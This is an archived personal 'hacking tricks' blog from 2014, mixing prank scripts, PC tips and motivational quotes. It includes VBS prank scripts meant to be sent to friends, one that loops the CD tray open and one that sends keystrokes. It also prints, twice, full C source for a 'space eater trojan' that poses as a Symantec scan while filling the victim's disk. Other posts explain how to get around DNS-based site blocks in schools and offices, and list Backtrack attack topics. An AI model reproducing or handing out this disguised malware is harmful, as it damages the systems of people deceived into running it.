Saturday, 23 August 2014
Sunday, 10 August 2014
virus to continiously open CD drive of computer
open notepad and write the following :
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it with cd.vbs and run it or send it to friend and ask him/her to run it for Prank.. ;)
How to Download Whole Website And Browse Offline
How to Download Whole Website And Browse Offline
Love browsing your favourite website over the internet? Well you can browse it even without any internet connection.You can download it altogether
and access offline?
Yes, it’s actually true! Now you don’t need to worry about your data usage while browsing your favourite websites or if there’s no internet access
while on a vacation, just get your
hands on one of these amazing softwares and voila!
1>HTTrack WEBSITE COPIER-
HTTrack is a free and easy to use offline browser utility. It allows you to download a World Wide Web site from the internet to a local directory,
building recursively all directories, getting HTML, images and other files from the server to your computer. HTTrack arranges the original site’s
relative link structure.
2>SURFOFFLINE-
It allows you to download entire website within few minutes so that you can access it in offline mode. You can also transfer it into portable media
like Pen drive or CD’s without any hassle.
Surfoffline is compatible with all versions of windows including XP, Vista and windows 7. Surfoffline has its own browsing interface and the offline
website can be exported into a folder, CHM format or MHT web archive.
3>OFFLINE DOWNLOADER-
This is designed to download internet websites the way you desire i.e. you can include any parts you need or exclude any parts that you don’t. It
can download upto 100 files at a time.
Considering such awesome softwares available for downloading your favourite websites, logging onto the internet might just become a 2nd option!
Download HTTrack : http://adf.ly/FUA1K
Download SurfOffline : http://adf.ly/FUA5Q
Download Offline Downloader : http://adf.ly/FUA9j
Increase your internet speed
increase your internet speed
Want to boost up ur internet speed??
Open Notepad and paste the below code in it.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"SackOpts"=dword:00000001
"TcpWindowSize"=dword:0005ae4c
"Tcp1323Opts"=dword:00000003
"DefaultTTL"=dword:00000040
"EnablePMTUBHDetect"=dword:00000000
"EnablePMTUDiscovery"=dword:00000001
"GlobalMaxTcpWindowSize"=dword:0005ae4c
and then,
Save the file with .reg extension.... like"speedy.reg" and then open it....
Saturday, 9 August 2014
HOW TO BE A GOOD HACKER
I will recommend all my new hackers friends that “HOW TO BE A GOOD HACKER!!!!!!”
1. At first create an own penetration lab (get vmware and 2 OS one for attacker OS and other is victim OS)
2. Attacker OS = backtrack 5
Victim OS = windows (or unix/osx/linux)
3. Search attack types on backtrack in youtube.com
ex: exploit/ windows/ fileformat,
exploit/ windows/browser,
exploit/ windows/smb etc.
4. Get videos and try it with yourself on your computer Virtual Victim OS
youtube search keywords forbacktrack (for beginner's) ::::::
backtrack SET,
backtrack windows hack,
backtrack Tor,
backtrack lan hack,
backtrack sqlmap,
backtrack metasploit,
backtrack forensics,
backtrack voip,
backtrack website attack,
backtrack vnc,
backtrack java applet atack,
backtrack infectious media,
backtrack web attack,
backtrack backdoor,
backtrack hashcrack,
backtrack armitage,
backtrack fuzzer,
backtrack MITM,
backtrack nmap,
backtrack zenmap,
backtrack network information gathering,
backtrack meterpreter,
backtrack metasploit,
backtrack dns spoof,
backtrack nessus,
backtrack gerix
search this keywords on youtube.com and try learn with yourself.
everythng should be educational purpose only.
Automatically write in Keyboard
Hack your friend’s keyboard and make
him type “You are a fool” :
simultaneously:
Code:
Set wshShell = wscript.CreateObject
(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
Save it as “keyboard.bat” and send to
your friend, if he runs it
Your Friend Keyboard automatically
writes “you are a fool”
How to Access blocked websites
Access blocked websites in school,colleges and office:
You may have faced errors when trying to access sites like youtube,facebook
etc in colleges,offices etc.,for many situation you can use proxy anonymizer
or server,but nowadays admins of colleges and offices have become clever,
they use opendns or similar sites to block the sites.., and there is still a way to
access sites blocked by dns.,we just have to change dns server to google
public dns <8.8.8.8>,for this follow the steps:
1. Open network and sharing center.
2. Click advanced adapter setting.
3. For LAN, right click on network and click properties.
4. Cycle through tabs to get configuration of TCP/IP V4
5. Change dns server to 8.8.8.8 ,, save it and
Viola, you have unblocked your favourite site..
if you have any problem.,comment.
Thursday, 19 June 2014
How to run Android apps on computer
You have to Just Install software named, BlueStacks on our Computer, after installing BlueStacks on our Computer, we can easily run any .apk file, which is an Android App indeed.
How to install Bluestacks ?
1. Download BlueStacks on your Computer:
2. After you Have Downloaded BlueStacks, Run Setup
file and Install BlueStacks on your Computer, it will take a While
3. Restart Computer after Installation of BlueStacks That’s It !! Now BlueStacks is Installed on Your Computer How to run Android app on PC through Bluestacks ?
1. Download any of your Favorite Android App on your PC.
2. Now after Downloading an Android App, Navigate to Folder where your newly Downloaded Android App is present
3. Right Click on Android App file(Having .apk extenstion) which you want to run
4. Select Open With Option
5. Click on Browse Button
6. Navigate to C:\Program Files\BlueStacks-Android Apk Handler Application Program
7. Click on OK
8. Click on OK again
9. Now again Double Click on Android App file which you want to Install
10. Installation Will Begin
11. A Confirmation message will pop-up
12. Now Open BlueStacks Program from Desktop
13. Now You can see the Android app you have Just Installed in BlueStacks.
Enjoy.. :)
Space eater Trojan source code
/* SPACE EATER TROJAN. USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/
#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;
void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);
void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}
void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");
if((choice=getch())!=13)
exit(0);
}
void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}
void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}
void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}
void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}
#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;
void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);
void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}
void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");
if((choice=getch())!=13)
exit(0);
}
void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}
void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}
void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}
void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}
Wednesday, 18 June 2014
7 Steve Jobs Quotes That Will Change Your Life.
1. If you haven’t found it yet, keep looking. Don’t settle. As with all matters of the heart, you’ll know when you find it. And like any great relationship,it just gets better and better as the years roll on.
2. Deciding what not to do is as important as deciding what to do.
3. I think if you do something and it turns out pretty good, then you should
go do something else wonderful, not dwell on it for too long. Just figure out what’s next.
4. Quality is much better than quantity. One home run is much better than two doubles.
5. Sometimes when you innovate, you make mistakes. It is best to admit them quickly, and get on with improving your other innovations.
6. If you want to live your life in a creative way, as an artist, you have to not look back too much. You have to be willing to take whatever you’ve done and whoever you were and throw them away.
7. We don’t get a chance to do that many things, and every one should be really excellent. Because this is our life. Life is brief, and then you die, you know? And we’ve all chosen to do this with our lives. So it better be damn good. It better be worth it..
Subscribe to:
Comments (Atom)

.jpg)

.jpg)
.jpg)



.jpg)







